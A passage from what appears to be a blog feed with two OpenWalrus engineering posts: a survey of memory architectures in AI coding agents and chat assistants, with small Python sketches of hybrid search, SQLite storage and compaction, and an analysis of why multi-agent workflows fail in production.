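    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb) if na and nb else 0.0

def keyword_score(query: str, doc: str) -> float:
    """Stand-in for BM25: fraction of query terms present in the doc."""
    q = set(query.lower().split())
    d = Counter(doc.lower().split())
    return sum(1 for t in q if d[t]) / len(q) if q else 0.0

def hybrid_rank(query, query_vec, memories, alpha=0.5):
    """memories: list of (text, embedding). Blend both signals and rank."""
    scored = [
        (alpha * cosine(query_vec, vec) + (1 - alpha) * keyword_score(query, text), text)
        for text, vec in memories
    ]
    return [text for score, text in sorted(scored, reverse=True)]
```

&lt;p&gt;The blend weight &lt;code&gt;alpha&lt;/code&gt; is the tuning knob: semantic-only misses literal identifiers, keyword-only misses paraphrases.&lt;/p&gt;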

&lt;p&gt;The pre-compaction flush is worth highlighting. Most systems lose information silently&lt;br&gt;
when compaction happens. OpenClaw turns compaction into an explicit memory-formation event.&lt;/p&gt;

&lt;h3&gt;
  
  
  ChatGPT (OpenAI)
&lt;/h3&gt;

&lt;p&gt;ChatGPT's memory is the most user-facing and the least transparent.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;User-controlled&lt;/strong&gt;: you tell ChatGPT to "remember this" and it does. It also
infers memories automatically from conversations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Proprietary backend&lt;/strong&gt; — no public documentation on storage format, compaction
strategy, or retrieval mechanism.&lt;/li&gt;
&lt;li&gt;Users can &lt;strong&gt;delete individual memories&lt;/strong&gt; or clear all. A "Temporary Chat" mode
disables memory entirely.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tiered persistence&lt;/strong&gt;: Plus and Pro users get longer-term memory. Free users
get lightweight short-term continuity.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The accessibility is unmatched — non-technical users can manage memory through a&lt;br&gt;
simple UI. But there's no programmatic access, no way to inspect the storage layer,&lt;br&gt;
and no portability.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cursor IDE
&lt;/h3&gt;

&lt;p&gt;Cursor treats memory as &lt;strong&gt;configuration, not knowledge&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;.cursorrules&lt;/code&gt;&lt;/strong&gt; (now deprecated) was a plaintext file in the project root
providing persistent instructions — essentially a system prompt extension.&lt;/li&gt;
&lt;li&gt;The replacement, &lt;strong&gt;&lt;code&gt;.cursor/rules/&lt;/code&gt;&lt;/strong&gt;, is a directory of rule files with more
granular control.&lt;/li&gt;
&lt;li&gt;The community-driven &lt;strong&gt;Memory Bank&lt;/strong&gt; pattern pushes this further: hierarchical
rule loading organized by development phase (analysis, planning, creative,
implementation). Only rules relevant to the current phase are loaded.&lt;/li&gt;
&lt;li&gt;No embeddings, no search, no learned facts. Rules are &lt;strong&gt;static instructions&lt;/strong&gt;
written by the developer.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Memory Bank pattern is telling. Users built an elaborate multi-phase memory&lt;br&gt;
system on top of a tool that only supports flat config files. The demand for real&lt;br&gt;
memory far exceeds what's offered.&lt;/p&gt;

&lt;h3&gt;
  
  
  Windsurf / Codeium
&lt;/h3&gt;

&lt;p&gt;Windsurf adds &lt;strong&gt;automatic memory generation&lt;/strong&gt; on top of manual rules.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The Cascade agent auto-generates memories in &lt;code&gt;~/.codeium/windsurf/memories/&lt;/code&gt;,
capturing coding patterns and project context.&lt;/li&gt;
&lt;li&gt;Memories are &lt;strong&gt;workspace-scoped&lt;/strong&gt; — knowledge from one project doesn't bleed
into another. Reasonable for code agents, but it means nothing transfers.&lt;/li&gt;
&lt;li&gt;Can infer agent configuration from &lt;strong&gt;AGENTS.md&lt;/strong&gt; files.&lt;/li&gt;
&lt;li&gt;Enterprise tier adds &lt;strong&gt;system-level rules&lt;/strong&gt; that admins deploy org-wide.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The workspace scoping is a deliberate tradeoff. It prevents context pollution&lt;br&gt;
between projects but also prevents learning that should transfer (your preferred&lt;br&gt;
test framework, your naming conventions, your error-handling patterns).&lt;/p&gt;

&lt;h3&gt;
  
  
  Feature coverage across products
&lt;/h3&gt;

&lt;p&gt;Which memory roles does each product actually implement? The radar chart below&lt;br&gt;
scores each product across all six memory roles.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
OpenClaw dominates episodic and semantic memory — its hybrid search pipeline&lt;br&gt;
covers the most ground. Claude Code has the strongest agent profile support but&lt;br&gt;
almost no semantic recall. ChatGPT leads on user profiles but scores low on&lt;br&gt;
everything developers care about. Cursor is a flat line — strong on agent profile,&lt;br&gt;
near-zero on everything else.&lt;/p&gt;

&lt;p&gt;The scatter chart shows the same data from a different angle — how many memory&lt;br&gt;
roles each product covers (x-axis) vs. how dynamically it learns (y-axis):&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Storage formats: markdown, SQLite, or vectors?
&lt;/h2&gt;

&lt;p&gt;The storage format determines everything downstream — what you can query, what&lt;br&gt;
you can inspect, and what happens when things go wrong.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Product&lt;/th&gt;
&lt;th&gt;Storage&lt;/th&gt;
&lt;th&gt;Search&lt;/th&gt;
&lt;th&gt;Compaction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Claude Code&lt;/td&gt;
&lt;td&gt;Markdown files&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;td&gt;Context window auto-compaction&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenClaw&lt;/td&gt;
&lt;td&gt;SQLite + sqlite-vec&lt;/td&gt;
&lt;td&gt;Hybrid (cosine + BM25)&lt;/td&gt;
&lt;td&gt;Pre-compaction flush&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ChatGPT&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;td&gt;Unknown&lt;/td&gt;
&lt;td&gt;Unknown&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cursor&lt;/td&gt;
&lt;td&gt;Text / Markdown&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Phase-based pruning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windsurf&lt;/td&gt;
&lt;td&gt;Local files&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Workspace isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mem0 (infra)&lt;/td&gt;
&lt;td&gt;DB-agnostic&lt;/td&gt;
&lt;td&gt;Pluggable&lt;/td&gt;
&lt;td&gt;Multi-stage extraction&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Markdown files&lt;/strong&gt; (Claude Code, Cursor, Windsurf) are human-readable,&lt;br&gt;
git-friendly, and require zero dependencies. You can &lt;code&gt;cat&lt;/code&gt; your agent's memory,&lt;br&gt;
edit it with vim, and commit it alongside your code. But there's no semantic&lt;br&gt;
search — you're limited to what fits in the context window.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SQLite + vectors&lt;/strong&gt; (OpenClaw) gives you structured queries, full-text search&lt;br&gt;
via FTS5, and semantic similarity via embeddings. The cost is opacity — you&lt;br&gt;
need tooling to inspect memories, and the embedding model becomes a dependency.&lt;/p&gt;
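&lt;p&gt;The keyword half of such a store fits in very little code using Python's built-in &lt;code&gt;sqlite3&lt;/code&gt; with FTS5. This is our minimal sketch of the pattern, not OpenClaw's actual schema; the vector half would add a sqlite-vec virtual table alongside it:&lt;/p&gt;

```python
import sqlite3

def init_memory_db(path=":memory:"):
    """Two tables: the canonical memory rows, plus an FTS5 index
    for keyword search over the same text."""
    db = sqlite3.connect(path)
    db.executescript("""
        CREATE TABLE memories(id INTEGER PRIMARY KEY, text TEXT);
        CREATE VIRTUAL TABLE memories_fts USING fts5(text);
    """)
    return db

def remember(db, text):
    cur = db.execute("INSERT INTO memories(text) VALUES (?)", (text,))
    db.execute("INSERT INTO memories_fts(rowid, text) VALUES (?, ?)",
               (cur.lastrowid, text))

def recall(db, query):
    """Keyword recall, best match first."""
    rows = db.execute(
        "SELECT text FROM memories_fts WHERE memories_fts MATCH ? ORDER BY rank",
        (query,))
    return [r[0] for r in rows]
```

&lt;p&gt;Everything still lives in a single file, but you now need a query tool rather than a text editor to see what the agent knows.&lt;/p&gt;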

&lt;p&gt;&lt;strong&gt;Proprietary backends&lt;/strong&gt; (ChatGPT) scale in the cloud and abstract&lt;br&gt;
away storage entirely. But your memories aren't portable, inspectable, or&lt;br&gt;
version-controllable.&lt;/p&gt;

&lt;p&gt;The fundamental tradeoff is &lt;strong&gt;inspectability vs. searchability&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Markdown is maximally inspectable but unsearchable at scale. Vector databases are&lt;br&gt;
maximally searchable but opaque. The products developers trust most — Claude Code,&lt;br&gt;
OpenClaw — choose inspectable formats and layer search on top, rather than starting&lt;br&gt;
with an opaque database.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compaction: what happens when the context window fills up
&lt;/h2&gt;

&lt;p&gt;Every agent eventually runs out of context space. What happens next defines&lt;br&gt;
the quality of long-running interactions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Naive truncation&lt;/strong&gt; drops the oldest messages. Simple, but destructive — it&lt;br&gt;
loses critical early context like system prompts and initial instructions. Most&lt;br&gt;
products have moved past this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;KV cache compaction&lt;/strong&gt; works at the inference layer. &lt;a href="https://arxiv.org/abs/2602.16284" rel="noopener noreferrer"&gt;Recent research&lt;/a&gt; demonstrates&lt;br&gt;
50x context reduction with minimal quality loss by compressing key-value attention&lt;br&gt;
caches mathematically. This is transparent to the application — the model sees a&lt;br&gt;
compressed but semantically equivalent context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hierarchical summarization&lt;/strong&gt; mirrors human memory: working memory overflows&lt;br&gt;
into episodic logs (timestamped transcripts), which are periodically summarized&lt;br&gt;
into semantic memory (searchable facts). The pipeline looks like:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Anchored iterative summarization&lt;/strong&gt; avoids reprocessing the entire history on&lt;br&gt;
every compaction. Only new message spans are summarized and merged with existing&lt;br&gt;
summaries. This is cheaper and avoids the progressive degradation that comes&lt;br&gt;
from summarizing summaries.&lt;/p&gt;
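&lt;p&gt;In sketch form, the anchor is just an index into the history; only messages past it are ever summarized again. The summarizer here is a trivial stand-in for what would be an LLM call:&lt;/p&gt;

```python
def naive_summarize(messages):
    """Stand-in for an LLM summarizer: keep the first clause of each message."""
    return " | ".join(m.split(".")[0] for m in messages)

class AnchoredSummarizer:
    """Only new messages since the last anchor are summarized; the existing
    summary is merged, never re-derived from the full history."""
    def __init__(self):
        self.summary = ""
        self.anchor = 0   # index of the first unsummarized message

    def compact(self, history):
        new_span = history[self.anchor:]
        if not new_span:
            return self.summary
        delta = naive_summarize(new_span)
        self.summary = f"{self.summary} | {delta}" if self.summary else delta
        self.anchor = len(history)
        return self.summary
```

&lt;p&gt;Because old spans are never re-summarized, earlier summaries are not degraded by repeated compression.&lt;/p&gt;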

&lt;p&gt;&lt;strong&gt;Episode pagination&lt;/strong&gt; segments conversations at natural cognitive boundaries —&lt;br&gt;
topic shifts, tool-use completions, user-initiated breaks. Each episode becomes&lt;br&gt;
an independently retrievable unit, which dramatically improves recall precision&lt;br&gt;
compared to arbitrary chunking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pre-compaction flush&lt;/strong&gt; is the most elegant pattern we found. Before trimming&lt;br&gt;
the context window, the agent gets an explicit turn to extract and persist all&lt;br&gt;
important facts. The agent itself decides what matters — not a heuristic, not a&lt;br&gt;
fixed window. OpenClaw implements this, and it's the pattern we're most interested&lt;br&gt;
in adopting.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
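&lt;p&gt;The flush itself is simple to express. Here is our sketch of the control flow, where &lt;code&gt;ask_agent&lt;/code&gt; stands in for the LLM call and &lt;code&gt;store&lt;/code&gt; for whatever memory backend is in use (both names are ours, not OpenClaw's):&lt;/p&gt;

```python
def pre_compaction_flush(history, ask_agent, store, keep_last=4):
    """Before trimming the context window, give the agent one explicit
    turn to persist what matters from the messages about to be dropped."""
    doomed = history[:-keep_last]
    if doomed:
        facts = ask_agent(
            "You are about to lose these messages. List the facts worth keeping:",
            doomed,
        )
        for fact in facts:
            store.append(fact)
    return history[-keep_last:]   # the trimmed context
```

&lt;p&gt;The key property: the extraction happens while the full context is still visible, so the agent decides what matters with complete information.&lt;/p&gt;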

&lt;p&gt;Research from &lt;a href="https://github.com/mem0ai/mem0" rel="noopener noreferrer"&gt;Mem0&lt;/a&gt; shows that smart compaction&lt;br&gt;
isn't just about saving tokens — it &lt;strong&gt;improves reasoning&lt;/strong&gt;. Their benchmarks&lt;br&gt;
report 5-11% improvements in reasoning tasks and 91% p95 latency reduction&lt;br&gt;
compared to full-context baselines. Compacting intelligently is better than&lt;br&gt;
throwing everything into the prompt.&lt;/p&gt;

&lt;h2&gt;
  
  
  Patterns worth stealing
&lt;/h2&gt;

&lt;p&gt;Five patterns emerged from this survey that we think every agent memory system&lt;br&gt;
should consider.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory as a hook, not a hardcoded subsystem.&lt;/strong&gt; OpenClaw implements memory&lt;br&gt;
through extensible interfaces rather than baking storage decisions into the&lt;br&gt;
core. This lets users swap backends without changing agent logic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dual-store architecture.&lt;/strong&gt; Keep a fast, inspectable format (markdown, TOML)&lt;br&gt;
for agent profiles and user preferences. Use a searchable store (SQLite + FTS,&lt;br&gt;
vectors) for episodic and semantic memory. Don't force everything into one format.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pre-compaction flush.&lt;/strong&gt; Before trimming context, give the agent an explicit&lt;br&gt;
turn to extract and persist important facts. This turns context compaction from&lt;br&gt;
a lossy operation into a memory-formation event.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Profile vs. recall separation.&lt;/strong&gt; Agent profiles (always-loaded identity) and&lt;br&gt;
recallable knowledge (searched on demand) serve different purposes. Conflating&lt;br&gt;
the two — loading everything into the prompt or searching everything on demand&lt;br&gt;
— creates either bloated prompts or slow retrieval. The best systems separate&lt;br&gt;
these concerns explicitly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Human-readable by default.&lt;/strong&gt; Every product that gained developer trust stores&lt;br&gt;
memory in formats humans can read and edit. Opaque databases create anxiety.&lt;br&gt;
Even when you add a searchable layer, the canonical format should be something&lt;br&gt;
you can open in a text editor.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Temporal knowledge graphs.&lt;/strong&gt; Pure vector retrieval loses relationships and&lt;br&gt;
time. A graph where entities are nodes and facts are edges — with timestamps&lt;br&gt;
tracking when each fact was true, not just when it was stored — outperforms&lt;br&gt;
flat RAG on temporal reasoning tasks. &lt;a href="https://arxiv.org/abs/2501.13956" rel="noopener noreferrer"&gt;Zep's research&lt;/a&gt;&lt;br&gt;
shows 18.5% higher accuracy and ~90% lower latency compared to vector-only&lt;br&gt;
baselines on complex temporal queries. The key is bi-temporal tracking:&lt;br&gt;
separating &lt;em&gt;when a fact was recorded&lt;/em&gt; from &lt;em&gt;when it was actually true&lt;/em&gt;. This&lt;br&gt;
is how "user is on vacation until March 15" can auto-expire without manual&lt;br&gt;
cleanup.&lt;/p&gt;
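&lt;p&gt;The bi-temporal idea reduces to two timestamps per fact. A minimal sketch (the field names are ours, not Zep's):&lt;/p&gt;

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional

@dataclass
class Fact:
    """Bi-temporal memory: recorded_at is when we learned the fact,
    valid_until is when it stops being true (None = no known expiry)."""
    text: str
    recorded_at: date
    valid_until: Optional[date] = None

def expired(fact: Fact, today: date) -> bool:
    return fact.valid_until is not None and today > fact.valid_until

def active_facts(facts, today):
    """Expired facts drop out of recall automatically; no cleanup job needed."""
    return [f for f in facts if not expired(f, today)]
```

&lt;p&gt;Recall filters on validity, so "on vacation until March 15" silently stops surfacing on March 16 while the record of it remains for temporal queries.&lt;/p&gt;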

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;This survey raised more questions than it answered. Here are the ones&lt;br&gt;
we keep coming back to.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can one storage layer do it all?&lt;/strong&gt; Markdown is inspectable but&lt;br&gt;
unsearchable. Vector databases are searchable but opaque. Every product&lt;br&gt;
picks a side or bolts one onto the other. Is there a single storage&lt;br&gt;
primitive that gives you both — human-readable &lt;em&gt;and&lt;/em&gt; semantically&lt;br&gt;
searchable — without the complexity of maintaining two separate systems?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should memory be a graph?&lt;/strong&gt; Flat key-value memories lose relationships.&lt;br&gt;
"Alice works on Project X" and "Project X uses Rust" are two disconnected&lt;br&gt;
facts in a vector store — but a graph trivially connects them. Zep's&lt;br&gt;
research shows 18.5% accuracy gains from graph-based retrieval on temporal&lt;br&gt;
queries. But graphs add complexity. Where's the crossover point where the&lt;br&gt;
complexity pays for itself?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Who decides what to remember?&lt;/strong&gt; Most products use heuristics or let&lt;br&gt;
users explicitly say "remember this." OpenClaw's pre-compaction flush&lt;br&gt;
is more interesting — the agent itself decides what matters before context&lt;br&gt;
is trimmed. But agent-driven memory formation introduces a new failure&lt;br&gt;
mode: the agent might remember the wrong things, or forget the right ones.&lt;br&gt;
How do you evaluate memory quality?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How should memories expire?&lt;/strong&gt; Date-anchored memory is the most&lt;br&gt;
underbuilt category in this survey. "User is on vacation until March 15"&lt;br&gt;
should auto-expire. But most systems store it identically to permanent&lt;br&gt;
facts. Bi-temporal tracking (separating when a fact was recorded from&lt;br&gt;
when it was true) solves this in theory — but no product we surveyed&lt;br&gt;
implements it well in practice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can memory transfer across agents?&lt;/strong&gt; Cursor and Windsurf scope memory&lt;br&gt;
to a single workspace. Claude Code scopes to a project directory. ChatGPT&lt;br&gt;
scopes to a user but not to a task. None of these scoping models feels&lt;br&gt;
right. Your preferred test framework should follow you everywhere. Your&lt;br&gt;
current project's auth implementation should not.&lt;/p&gt;

&lt;p&gt;We wrote about how we're approaching these questions in&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;Graph + vector: how OpenWalrus agents remember&lt;/a&gt;.&lt;br&gt;
If you're building agent memory systems, we'd love to compare notes —&lt;br&gt;
open an issue on &lt;a href="https://github.com/openwalrus/walrus" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt; or find&lt;br&gt;
us in the discussions.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Why multi-agent workflows fail in production</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:52:27 +0000</pubDate>
      <link>https://forem.com/crabtalk/why-multi-agent-workflows-fail-in-production-5d2a</link>
      <guid>https://forem.com/crabtalk/why-multi-agent-workflows-fail-in-production-5d2a</guid>
      <description>&lt;p&gt;Multi-agent sounds like the obvious answer: parallelize work, specialize agents,&lt;br&gt;
go faster. And for demos, it works — you can show three agents collaborating on&lt;br&gt;
a feature and it looks impressive.&lt;/p&gt;

&lt;p&gt;In production, the failures are consistent enough that Cognition — the team behind&lt;br&gt;
Devin — published a post titled&lt;br&gt;
&lt;a href="https://cognition.ai/blog/dont-build-multi-agents" rel="noopener noreferrer"&gt;Don't Build Multi-Agents&lt;/a&gt;.&lt;br&gt;
The GitHub blog ran&lt;br&gt;
&lt;a href="https://github.blog/ai-and-ml/generative-ai/multi-agent-workflows-often-fail-heres-how-to-engineer-ones-that-dont/" rel="noopener noreferrer"&gt;Multi-agent workflows often fail. Here's how to engineer ones that don't.&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These aren't fringe complaints. They're structural.&lt;/p&gt;

&lt;h2&gt;
  
  
  Context doesn't travel
&lt;/h2&gt;

&lt;p&gt;The foundational problem: each subagent starts fresh. The only information that&lt;br&gt;
passes between agents is the task prompt string. Everything the parent agent&lt;br&gt;
discovered — the codebase structure, constraints, decisions already made — has&lt;br&gt;
to be re-communicated explicitly or re-discovered from scratch.&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://code.claude.com/docs/en/sub-agents" rel="noopener noreferrer"&gt;Claude Code docs&lt;/a&gt; acknowledge this&lt;br&gt;
directly:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Subagents might miss the strategic goal or important constraints known to&lt;br&gt;
the parent agent, leading to solutions that are technically correct but not&lt;br&gt;
perfectly aligned with the user's original intent."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In practice this plays out as "context amnesia." One documented case: a user asked&lt;br&gt;
Claude Code to fix failing tests and it repeatedly spawned subagents for work that&lt;br&gt;
could have been done in the main context — burning through tokens with no benefit&lt;br&gt;
because each subagent re-explored files the parent already understood.&lt;br&gt;
&lt;a href="https://github.com/anthropics/claude-code/issues/11712" rel="noopener noreferrer"&gt;GitHub issue #11712&lt;/a&gt;&lt;br&gt;
captures a related failure: when agents are resumed, they lose the user prompt that&lt;br&gt;
initiated the resumption, so the resumed agent lacks the context that explains why&lt;br&gt;
it exists.&lt;/p&gt;

&lt;p&gt;The community workaround is "Main Agent as Project Manager with State Awareness":&lt;br&gt;
the parent agent maintains a shared context document and explicitly passes relevant&lt;br&gt;
state to each subagent's prompt. This works, but it's manual prompt engineering —&lt;br&gt;
the developer is doing the coordination work that the system should handle.&lt;/p&gt;
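&lt;p&gt;In code, the workaround amounts to threading a shared state dictionary through every subagent prompt. A sketch of the pattern (the function and format are ours, illustrating the idea rather than any specific tool):&lt;/p&gt;

```python
def build_subagent_prompt(task, shared_context):
    """The parent does the coordination work: every subagent prompt carries
    the shared state explicitly, since nothing else travels between agents."""
    lines = ["## Shared project state"]
    for key, value in shared_context.items():
        lines.append(f"- {key}: {value}")
    lines.append("")
    lines.append("## Your task")
    lines.append(task)
    return "\n".join(lines)
```

&lt;p&gt;It works, but the developer is maintaining the context document by hand, and anything left out of it is invisible to the subagent.&lt;/p&gt;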

&lt;h2&gt;
  
  
  Parallel agents conflict
&lt;/h2&gt;

&lt;p&gt;When agents run in parallel, they make independent decisions about shared state.&lt;br&gt;
&lt;a href="https://cognition.ai/blog/dont-build-multi-agents" rel="noopener noreferrer"&gt;Cognition's analysis&lt;/a&gt; makes the&lt;br&gt;
problem concrete:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"If a task is 'build a Flappy Bird clone' divided into subtasks, one subagent&lt;br&gt;
might build a Super Mario Bros. background while another builds an incompatible&lt;br&gt;
bird, leaving the final agent to combine these miscommunications."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The GitHub Blog identifies the systemic version of this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Agents may close issues that other agents just opened, or ship changes that fail&lt;br&gt;
downstream checks they didn't know existed, because agents make implicit assumptions&lt;br&gt;
about state, ordering, and validation without explicit instructions."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The failure mode compounds. From &lt;a href="https://towardsdatascience.com/why-your-multi-agent-system-is-failing-escaping-the-17x-error-trap-of-the-bag-of-agents/" rel="noopener noreferrer"&gt;Towards Data Science&lt;/a&gt;:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"When one agent decides something incorrectly, downstream agents assume it's true,&lt;br&gt;
and by discovery time, 10 downstream decisions are built on that error."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This is why Devin avoids parallel agents entirely. It's not a capability limitation —&lt;br&gt;
it's an architectural choice based on the failure modes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cost and latency explode
&lt;/h2&gt;

&lt;p&gt;Multi-agent token consumption doesn't scale linearly. The GitHub Blog documents the&lt;br&gt;
production gap:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;3-agent workflows that cost $5–50 in demos reach &lt;strong&gt;$18,000–90,000/month at scale&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Response times jump from 1–3 seconds to 10–40 seconds per request&lt;/li&gt;
&lt;li&gt;Reliability drops from 95–98% in pilots to 80–87% under production load&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The underlying cause: every inter-agent handoff requires token-intensive context reconstruction.&lt;br&gt;
The parent encodes its state into a prompt; the subagent re-processes the entire relevant context&lt;br&gt;
from scratch. Multiplied across many agents and many calls, the token budget explodes.&lt;/p&gt;

&lt;p&gt;Cursor's background agents add a different dimension: cloud environment reliability.&lt;br&gt;
User-reported failures include Docker builds failing during &lt;code&gt;apt-get update&lt;/code&gt;, git branch&lt;br&gt;
push failures, connection dropouts that stall agents mid-task, and cloud environment&lt;br&gt;
initialization errors. The compute is remote and shared, so failures that don't exist&lt;br&gt;
locally appear at scale.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where each system struggles
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The chart reflects the research above. Claude Code is strong on environment reliability&lt;br&gt;
(local execution) but has no mechanism for context continuity or parallel conflict handling.&lt;br&gt;
Cursor partially addresses parallelism through Git worktrees but has the opposite reliability&lt;br&gt;
profile — cloud execution introduces environment failures. Devin avoids parallel agents&lt;br&gt;
entirely and invests heavily in error recovery through its review agent, which is why&lt;br&gt;
it scores high on those axes but zero on parallel conflict handling.&lt;/p&gt;

&lt;p&gt;No system in the current survey scores well across all five dimensions. Context continuity&lt;br&gt;
is the universal weak spot.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why better models don't fix this
&lt;/h2&gt;

&lt;p&gt;The &lt;a href="https://composio.dev/blog/why-ai-agent-pilots-fail-2026-integration-roadmap" rel="noopener noreferrer"&gt;2026 AI Agent Report&lt;/a&gt;&lt;br&gt;
is direct:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Most multi-agent failures aren't caused by weak models — they're caused by weak&lt;br&gt;
reasoning architecture. Orchestrating multiple agents with divergent goals, conflicting&lt;br&gt;
information, and cascading failures requires architectural discipline."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Code quality compounds the issue. A January 2026 &lt;a href="https://stackoverflow.blog/2026/01/28/are-bugs-and-incidents-inevitable-with-ai-coding-agents/" rel="noopener noreferrer"&gt;Stack Overflow Blog analysis&lt;/a&gt;&lt;br&gt;
found that AI-generated code includes bugs at 1.5–2x the rate of human-written code when&lt;br&gt;
supervision gaps exist, with 3x the readability issues. Multi-agent workflows create&lt;br&gt;
supervision gaps by design — no single reviewer sees the whole picture.&lt;/p&gt;

&lt;p&gt;The integration layer is where failures originate: how agents hand off state, coordinate&lt;br&gt;
writes, report progress, and signal when they're stuck. Models are getting better;&lt;br&gt;
orchestration architecture largely isn't.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the research says works
&lt;/h2&gt;

&lt;p&gt;The GitHub Blog identifies several patterns that prevent the most common failures:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Typed schemas for inter-agent messages.&lt;/strong&gt; Without explicit contracts between agents,&lt;br&gt;
every handoff is a natural language interpretation problem. Typed schemas eliminate a&lt;br&gt;
class of coordination errors before they happen.&lt;/p&gt;
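&lt;p&gt;A minimal version of such a contract, sketched as a frozen dataclass with a validation gate (the field set is illustrative, not taken from the GitHub post):&lt;/p&gt;

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Handoff:
    """Typed inter-agent message: the contract is explicit fields,
    not a prose blob the receiving agent has to interpret."""
    task_id: str
    goal: str
    constraints: tuple = ()
    decisions_made: tuple = ()

def validate(msg: Handoff) -> Handoff:
    """Reject malformed handoffs at the boundary, before any work starts."""
    if not msg.task_id or not msg.goal:
        raise ValueError("handoff missing required fields")
    return msg
```

&lt;p&gt;The structure forces the sender to state constraints and prior decisions explicitly instead of assuming the receiver will infer them.&lt;/p&gt;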

